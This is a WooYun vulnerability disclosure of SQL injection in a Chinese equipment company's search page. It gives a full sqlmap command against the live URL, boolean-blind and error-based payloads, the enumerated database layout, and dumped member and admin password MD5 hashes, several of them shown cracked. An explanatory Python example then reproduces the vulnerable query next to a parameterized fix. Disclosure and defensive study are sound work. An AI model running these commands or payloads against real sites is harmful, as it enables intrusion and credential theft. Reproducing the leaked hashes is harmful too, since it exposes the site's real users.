
Defect ID: wooyun-2016-0195351

Vulnerability title: SQL injection in the main www site of 苏州艾姆阿欧机电设备有限公司 (large number of user passwords)

Affected vendor: 苏州艾姆阿欧机电设备有限公司

Author: 路人甲

Submitted: 2016-04-13 15:32

Fix time: 2016-05-28 15:40

Disclosure time: 2016-05-28 15:40

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2016-04-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-28: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As per the title.

Detailed description:

$ python sqlmap.py -u "http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8%E5%99%A8" -p tag --technique=BE --output-dir=output --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: ehs360.com_2010
Table: ehse_member
[15 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 156a1a6f6ea26d3456e7ab65f0e6f86c |
| 1c88d37be4e1d375f341d906f58288f4 (201314) |
| 2205e69e7376e166b68f431614c848b1 |
| 3fc44fddce2f58ec26b3871190982993 (imissyou) |
| 73d714bd2fd44248f0206b9dce94fdf7 |
| 7fef5b36f121d34f4e11219f88c9f89a |
| 8267ddabf72bff6a84ea53db8bc2e8b7 |
| 887ba5be6381df15715cdc9b15034a67 |
| 9e0fb72c88ee523675e4f1a25b970d92 |
| a88edfd5974d1c11c459e0c025a1bc1f |
| ae47913d58aee2c5941efb7def7b863e |
| df3192aef281ee9a36a2d43bbd520177 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e982bbd2514d2e3577282738ea53b002 |
| eabd8ce9404507aa8c22714d3f5eada9 (aaa111) |
+---------------------------------------------+
Database: ehs360.com_2010
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+
Database: ehs360.com
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

Proof of vulnerability:

---
Parameter: tag (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND 7092=7092 AND '%'='
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND (SELECT 4599 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4599=4599,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL 5.0
current user: 'ehs360.com@localhost'
current user is DBA: False
database management system users [1]:
[*] 'ehs360.com'@'localhost'
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 588 |
| GLOBAL_STATUS | 291 |
| SESSION_STATUS | 291 |
| GLOBAL_VARIABLES | 272 |
| SESSION_VARIABLES | 272 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128 |
| COLLATIONS | 127 |
| PARTITIONS | 52 |
| TABLES | 52 |
| CHARACTER_SETS | 36 |
| SCHEMA_PRIVILEGES | 36 |
| KEY_COLUMN_USAGE | 22 |
| STATISTICS | 22 |
| TABLE_CONSTRAINTS | 22 |
| PLUGINS | 10 |
| ENGINES | 8 |
| SCHEMATA | 3 |
| PROCESSLIST | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
Database: ehs360.com
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ehse_promodel | 8985 |
| ehse_attachment | 6690 |
| ehse_pro | 4904 |
| ehse_article | 1230 |
| ehse_protype | 596 |
| ehse_manage | 2 |
| ehse_gbook | 1 |
+---------------------------------------+---------+
Database: ehs360.com_2010
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| ehse_promodel | 8975 |
| ehse_pro_has_tag | 8482 |
| ehse_attachment | 6033 |
| ehse_pro | 4447 |
| ehse_article | 1203 |
| ehse_pro0 | 871 |
| ehse_protype | 544 |
| ehse_protag | 413 |
| ehse_gbook | 35 |
| ehse_inquiry | 21 |
| ehse_member | 15 |
| ehse_page | 12 |
| ehse_config | 11 |
| ehse_articletype | 2 |
| ehse_manage | 2 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: ehs360.com_2010
Table: ehse_member
[1 column]
+----------+--------------+
| Column | Type |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+
Database: ehs360.com_2010
Table: ehse_manage
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: ehs360.com
Table: ehse_manage
[1 column]
+----------+-------------+
| Column | Type |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Database: ehs360.com_2010
Table: ehse_member
[15 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 156a1a6f6ea26d3456e7ab65f0e6f86c |
| 1c88d37be4e1d375f341d906f58288f4 (201314) |
| 2205e69e7376e166b68f431614c848b1 |
| 3fc44fddce2f58ec26b3871190982993 (imissyou) |
| 73d714bd2fd44248f0206b9dce94fdf7 |
| 7fef5b36f121d34f4e11219f88c9f89a |
| 8267ddabf72bff6a84ea53db8bc2e8b7 |
| 887ba5be6381df15715cdc9b15034a67 |
| 9e0fb72c88ee523675e4f1a25b970d92 |
| a88edfd5974d1c11c459e0c025a1bc1f |
| ae47913d58aee2c5941efb7def7b863e |
| df3192aef281ee9a36a2d43bbd520177 |
| e10adc3949ba59abbe56e057f20f883e (123456) |
| e982bbd2514d2e3577282738ea53b002 |
| eabd8ce9404507aa8c22714d3f5eada9 (aaa111) |
+---------------------------------------------+
Database: ehs360.com_2010
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+
Database: ehs360.com
Table: ehse_manage
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 0b955df439d1dc3292aa9d44aa816dfb |
| 6a4decac41068f5635de848388b54581 |
+----------------------------------+

Remediation:

Filter the input.

Copyright notice: when reposting, please credit the source: 路人甲@乌云
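The boolean-based payload sqlmap reported (`%' AND 7092=7092 AND '%'='`) only makes sense if search.php builds a `LIKE '%...%'` clause by concatenating the `tag` parameter into the SQL string. The following is an added example, not code from the report or from the affected site: it reconstructs that query shape on an in-memory SQLite database, shows why the true/false probe pair gives a reliable injection oracle, and places the parameterized version beside it. The table `ehse_pro` with a `tag` column, the sample rows, and the helper names are assumptions; the site itself runs PHP and MySQL, where the same fix is a prepared statement (mysqli or PDO) with a bound parameter.

```python
"""Added example (not from the WooYun report): string-concatenated LIKE search
beside its parameterized fix, exercised with the page's boolean-blind probes."""
import sqlite3

# Constructed sample data. The real schema is not on the page; the table and
# column names are assumptions modelled on search.php's 'tag' parameter.
SAMPLE_ROWS = [
    (1, "Respirator model A", "呼吸器"),
    (2, "Respirator model B", "呼吸器"),
    (3, "Safety helmet", "安全帽"),
]

# The probe pair sqlmap uses to confirm boolean-based blind injection, reduced to
# its shape: both close the LIKE literal, one with a true and one with a false
# condition, then re-open a literal so the trailing quote stays balanced.
TRUE_PROBE = "呼吸器%' AND 7092=7092 AND '%'='"
FALSE_PROBE = "呼吸器%' AND 7092=7093 AND '%'='"


def make_db():
    """Build the in-memory database with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ehse_pro (id INTEGER PRIMARY KEY, name TEXT, tag TEXT)")
    conn.executemany("INSERT INTO ehse_pro VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn, tag):
    """The defective pattern: the request value becomes SQL syntax."""
    sql = "SELECT id FROM ehse_pro WHERE tag LIKE '%" + tag + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, tag):
    """The fix: bind the value, and escape LIKE metacharacters so '%' and '_'
    typed by the user match literally instead of widening the search."""
    escaped = (tag.replace("\\", "\\\\")
                  .replace("%", "\\%")
                  .replace("_", "\\_"))
    sql = "SELECT id FROM ehse_pro WHERE tag LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


def differs_on_probes(search_fn, conn):
    """Regression check a developer can keep in the test suite: a sound search
    treats both probes as literal text, so they return the same rows (none here).
    The concatenating version returns rows for the true probe only."""
    return search_fn(conn, TRUE_PROBE) != search_fn(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", search_vulnerable), ("fixed", search_fixed)):
        print(name, "benign:", fn(db, "呼吸器"),
              "true probe:", fn(db, TRUE_PROBE),
              "false probe:", fn(db, FALSE_PROBE),
              "injectable:", differs_on_probes(fn, db))
```

With the concatenating version, the true probe returns the same rows as the benign search and the false probe returns none, which is exactly the difference sqlmap measured to declare the parameter injectable; with the bound parameter both probes return nothing and `differs_on_probes` reports `False`. Note also what the dump on this page shows about the `password` column: 32-character hex digests, several of which sqlmap's built-in wordlist resolved to values such as `123456`, so the column holds unsalted MD5 hashes and the fix should include re-hashing stored passwords with a slow, salted algorithm alongside closing the injection.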


Vulnerability response

Vendor response:

Vendor could not be reached, or vendor actively refused.

Vulnerability Rank: 15 (WooYun rating)